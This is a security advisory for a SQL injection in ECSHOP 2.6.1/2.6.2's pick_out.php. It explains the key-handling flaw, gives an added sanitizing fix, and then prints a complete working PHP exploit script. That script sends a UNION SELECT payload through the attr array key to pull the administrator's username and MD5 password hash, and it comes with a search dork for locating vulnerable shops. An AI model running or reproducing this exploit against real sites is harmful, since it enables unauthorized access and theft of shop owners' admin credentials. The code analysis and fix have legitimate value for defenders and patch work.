Affected versions:
ECSHOP 2.6.1/2.6.2
Product description:
ECSHOP is a free, open-source online shop system. It is upgraded and maintained by a professional development team that provides timely and efficient technical support, and you can customize ECSHOP to fit your own business and add features specific to your shop.
Vulnerability analysis:
The file includes/init.php checks get_magic_quotes_gpc(); if it is off, addslashes_deep() is called on the request arrays:
    // includes/init.php
    if (!get_magic_quotes_gpc())
    {
        if (!empty($_GET))
        {
            $_GET = addslashes_deep($_GET);
        }
        if (!empty($_POST))
        {
            $_POST = addslashes_deep($_POST);
        }
        $_COOKIE = addslashes_deep($_COOKIE);
        $_REQUEST = addslashes_deep($_REQUEST);
    }
addslashes_deep() in includes/lib_base.php ultimately escapes the input with addslashes():
    // includes/lib_base.php
    function addslashes_deep($value)
    {
        if (empty($value))
        {
            return $value;
        }
        else
        {
            return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
            // only the array values are processed, never the keys :)
        }
    }
Now let's look at the code that actually causes the vulnerability, in pick_out.php:
    // pick_out.php
    if (!empty($_GET['attr']))
    {
        foreach($_GET['attr'] as $key => $value)
        {
            $key = intval($key);
            $_GET['attr'][$key] = htmlspecialchars($value);
            // foreach iterates over a copy of the array, so this processing does not
            // touch the array's original keys and values
            // so arbitrary keys can be introduced :)
            // did the programmer's logic go wrong?
        }
    }
    …
    foreach ($_GET['attr'] AS $key => $value)
    {
        $attr_url .= '&attr[' . $key . ']=' . $value;
        $attr_picks[] = $key;
        if ($i > 0)
        {
            if (empty($goods_result))
            {
                break;
            }
            // injection through the key :)
            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");
Because $key is never escaped when magic_quotes_gpc=off, and the array assignment in the first loop has a logic flaw (it adds a new integer key instead of replacing the original one), the original key reaches the SQL string unchanged and an injection vulnerability results.
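To make the key-handling flaw concrete, here is an added example (not ECSHOP's own code): the same loop as pick_out.php beside a fixed version that rebuilds the array and keeps only digit-only keys. $attr stands in for $_GET['attr'], and the sample input is constructed.

```php
<?php
// Added example, not ECSHOP's code. $attr stands in for $_GET['attr'];
// the sample input at the bottom is constructed for the demonstration.

// Same pattern as pick_out.php: foreach walks a copy of the array, so the
// reassigned $key only adds a new integer entry; the original key survives
// untouched and is what the later SQL-building loop sees.
function sanitize_attr_vulnerable(array $attr): array
{
    foreach ($attr as $key => $value) {
        $key = intval($key);
        $attr[$key] = htmlspecialchars($value);
    }
    return $attr;
}

// Fixed version: build a fresh array so that only keys made purely of digits
// are kept (cast to int) with their value escaped; any other key is dropped,
// so nothing but an integer can ever reach attr_id in the query.
function sanitize_attr_fixed(array $attr): array
{
    $clean = array();
    foreach ($attr as $key => $value) {
        if (!ctype_digit((string) $key)) {
            continue;
        }
        $clean[(int) $key] = htmlspecialchars((string) $value);
    }
    return $clean;
}

// Produce the attr_id list a safe query would interpolate: integers only,
// so no quoting of user-controlled text is needed at all.
function attr_id_list(array $clean): string
{
    return implode(',', array_map('intval', array_keys($clean)));
}

// Constructed input: one legitimate attribute id and one non-numeric key.
$input = array('7' => 'red', 'abc' => 'x');

var_export(sanitize_attr_vulnerable($input));
echo "\n";
var_export(sanitize_attr_fixed($input));
echo "\n", attr_id_list(sanitize_attr_fixed($input)), "\n";
```

Running it shows the non-numeric key 'abc' still present after the original loop (only a new key 0 was added beside it), while the fixed loop leaves just the integer key 7.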
Exploit:
    #!/usr/bin/php
    <?php
    // This program is for technical exchange only; do not use it for illegal purposes!!
    print_r('
    +---------------------------------------------------------------------------+
    ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
    by puret_t
    mail: puretot at gmail dot com
    team: http://bbs.wolvez.org
    dork: "Powered by ECShop"
    +---------------------------------------------------------------------------+
    ');
    /**
     * works with magic_quotes_gpc = Off
     */
    if ($argc < 3) {
        print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' host path
    host: target server (ip/hostname)
    path: path to ecshop
    Example:
    php '.$argv[0].' localhost /ecshop/
    +---------------------------------------------------------------------------+
    ');
        exit;
    }
    error_reporting(7);
    ini_set('max_execution_time', 0);
    $host = $argv[1];
    $path = $argv[2];
    $resp = send();
    preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);
    if ($hash)
        exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
    else
        exit("Exploit Failed!\n");
    function send()
    {
        global $host, $path;
        $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';
        $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
        $data .= "Host: $host\r\n";
        $data .= "Connection: Close\r\n\r\n";
        $fp = fsockopen($host, 80);
        fputs($fp, $data);
        $resp = '';
        while ($fp && !feof($fp))
            $resp .= fread($fp, 1024);
        return $resp;
    }
    ?>
Solution:
Vendor patch
ECSHOP
----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:
http://www.ecshop.com
Source:
<*Source: ryat#www.wolvez.org
Link: http://www.80vul.com
*>